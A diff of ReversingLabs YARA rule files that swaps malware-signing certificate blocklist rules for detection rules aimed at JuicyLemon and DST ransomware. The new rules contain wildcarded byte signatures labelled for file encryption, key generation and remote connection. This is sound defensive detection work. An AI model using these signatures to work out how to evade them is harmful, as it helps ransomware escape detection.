+            46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53
+            57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54
+            24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ??
+            ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$generate_key = {
+            50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ??
+            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
+            6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ??
+            ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C
+            24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24
+            ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24
+            ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ??
+            ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ??
+            89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ??
+            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B
+            4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ??
+            ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56
+            89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83
+            C4 ?? C2
+        }
+		$remote_connection = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83
+            F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ??
+            ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24
+            ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56
+            ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44
+            24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B
+            56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8
+            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects JuicyLemon ransomware."
 		author = "ReversingLabs"
-		id = "094a02ee-394b-5989-9f73-6b942aca5500"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "35e4bbd6-422b-562e-98fc-fe932270dbb8"
+		date = "2020-08-17"
+		modified = "2020-08-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5770-L5786"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "JuicyLemon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5788-L5804"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ??
+            ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2
+        }
+		$remote_connection_2 = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6
+            59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files_and_encrypt = {
+            E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57
+            A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74
+            ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF
+            D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ??
+            ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ??
+            ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ??
+            ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1
+            ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ??
+            ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
+            ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ??
+            ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B
+            5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D
+            ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B
+            14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ??
+            ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ??
+            ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ??
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DST ransomware."
 		author = "ReversingLabs"
-		id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "bcc9933d-14eb-5f83-a136-5f009c7a3282"
+		date = "2021-12-06"
+		modified = "2021-12-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5806-L5822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DST"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAT11 d.o.o." and pe.signatures [ i ] . serial == "01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "a4432990-8c2f-523c-8a9d-cba578aaefc5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5824-L5842"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48
+            89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ??
+            31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB
+            0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D
+        }
+		$encrypt_files_p2 = {
+            48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ??
+            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ??
+            48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ??
